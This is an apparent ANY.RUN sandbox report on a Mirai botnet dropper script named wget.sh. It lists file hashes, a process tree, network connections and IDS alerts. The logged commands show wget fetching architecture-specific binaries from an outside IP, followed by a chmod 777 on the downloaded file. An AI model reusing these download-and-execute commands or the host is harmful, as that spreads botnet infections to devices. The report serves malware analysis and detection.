File name:

wget.sh

Full analysis: https://app.any.run/tasks/92c01016-46e0-4704-9a48-291aaf9a4b7a
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Malware Trends Tracker     >>>
Analysis date: May 18, 2025, 20:49:53
OS: Ubuntu 22.04.2
Tags:
mirai
botnet
Indicators:
MIME: text/plain
File info: ASCII text
MD5:

482B50D4306C49AEE3C1060AA2535185

SHA1:

0DFC80AA4251812D3ECABC90E73A2B9BE8CD9497

SHA256:

1225A00CD892AE2141A53E1C448461E2461CC0A83FDC3D62AE0D0A96CEF11217

SSDEEP:

12:7AXoE+75AKzE+XNI1AM4wA+86A6K4WH+aA/F+nAGC+5gArV+zF5AqF4+cSA/Xua6:EXTAxNIKRv6K4zNKFuFeqFS/ARWVYv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • MIRAI has been detected (SURICATA)

      • wget (PID: 39883)

  • SUSPICIOUS

    • Executes commands using command-line interpreter

      • sudo (PID: 39865)
      • bash (PID: 39866)

    • Uses wget to download content

      • bash (PID: 39866)

    • Modifies file or directory owner

      • sudo (PID: 39862)

    • Connects to the server without a host name

      • wget (PID: 39868)
      • wget (PID: 39889)
      • wget (PID: 39886)
      • wget (PID: 39892)
      • wget (PID: 39895)
      • wget (PID: 39877)
      • wget (PID: 39880)
      • wget (PID: 39883)
      • wget (PID: 39898)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 39866)

  • INFO

    • Checks timezone

      • wget (PID: 39871)
      • wget (PID: 39874)
      • wget (PID: 39877)
      • wget (PID: 39868)
      • wget (PID: 39886)
      • wget (PID: 39883)
      • wget (PID: 39880)
      • wget (PID: 39889)
      • wget (PID: 39895)
      • wget (PID: 39892)
      • wget (PID: 39898)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
171
Monitored processes
41
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs #MIRAI wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs rm no specs

Process information

PID
CMD
Path
Indicators
Parent process
39861/bin/sh -c "sudo chown user /tmp/wget\.sh && chmod +x /tmp/wget\.sh && DISPLAY=:0 sudo -iu user /tmp/wget\.sh "/usr/bin/dashoF5qt7VjSoEVMhQn
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
39862sudo chown user /tmp/wget.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
39863chown user /tmp/wget.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
39864chmod +x /tmp/wget.sh/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
39865sudo -iu user /tmp/wget.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
39866-bash --login -c \/tmp\/wget\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
39867/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
39868wget http://160.191.244.17/bins/jew.arm/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
2048
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0
39869chmod 777 jew.arm/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
39870-bash --login -c \/tmp\/wget\.sh/usr/bin/bashbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
32512
Executable files
0
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

No data
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
19
DNS requests
11
Threats
13

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
39868
wget
GET
404
160.191.244.17:80
http://160.191.244.17/bins/jew.arm
unknown
unknown
GET
204
185.125.190.18:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
39871
wget
GET
404
160.191.244.17:80
http://160.191.244.17/bins/jew.arm5
unknown
unknown
39874
wget
GET
404
160.191.244.17:80
http://160.191.244.17/bins/jew.arm6
unknown
unknown
39883
wget
GET
404
160.191.244.17:80
http://160.191.244.17/bins/jew.mips
unknown
unknown
39877
wget
GET
404
160.191.244.17:80
http://160.191.244.17/bins/jew.arm7
unknown
unknown
39880
wget
GET
404
160.191.244.17:80
http://160.191.244.17/bins/jew.m68k
unknown
unknown
39886
wget
GET
404
160.191.244.17:80
http://160.191.244.17/bins/jew.mpsl
unknown
unknown
39889
wget
GET
404
160.191.244.17:80
http://160.191.244.17/bins/jew.ppc
unknown
unknown
39892
wget
GET
404
160.191.244.17:80
http://160.191.244.17/bins/jew.sh4
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
484
avahi-daemon
224.0.0.251:5353
unknown
91.189.91.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
185.125.190.18:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
169.150.255.183:443
odrs.gnome.org
GB
whitelisted
185.125.188.57:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
39868
wget
160.191.244.17:80
JP
unknown
39871
wget
160.191.244.17:80
JP
unknown
39874
wget
160.191.244.17:80
JP
unknown
39877
wget
160.191.244.17:80
JP
unknown
39880
wget
160.191.244.17:80
JP
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.46
  • 2a00:1450:4001:808::200e
whitelisted
connectivity-check.ubuntu.com
  • 185.125.190.18
  • 91.189.91.98
  • 91.189.91.49
  • 185.125.190.48
  • 185.125.190.17
  • 185.125.190.96
  • 185.125.190.98
  • 91.189.91.48
  • 185.125.190.49
  • 185.125.190.97
  • 91.189.91.96
  • 2620:2d:4000:1::98
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::2a
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::23
  • 2001:67c:1562::23
  • 2620:2d:4000:1::22
  • 2001:67c:1562::24
whitelisted
odrs.gnome.org
  • 169.150.255.183
  • 195.181.175.40
  • 212.102.56.179
  • 195.181.170.19
  • 37.19.194.80
  • 207.211.211.27
  • 169.150.255.181
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::21
whitelisted
api.snapcraft.io
  • 185.125.188.57
  • 185.125.188.58
  • 185.125.188.54
  • 185.125.188.59
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::117
whitelisted
3.100.168.192.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
39868
wget
Potentially Bad Traffic
ET INFO ARM File Download Request from IP Address
39871
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .arm file File
39874
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .arm file File
39880
wget
Potentially Bad Traffic
ET INFO m68k File Download Request from IP Address
39877
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .arm file File
39877
wget
Potentially Bad Traffic
ET INFO ARM7 File Download Request from IP Address
39883
wget
A Network Trojan was detected
AV INFO Possible Mirai .mips Executable Download
39883
wget
Potentially Bad Traffic
ET INFO MIPS File Download Request from IP Address
39889
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .sh4 File
39889
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .ppc File
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
wget.sh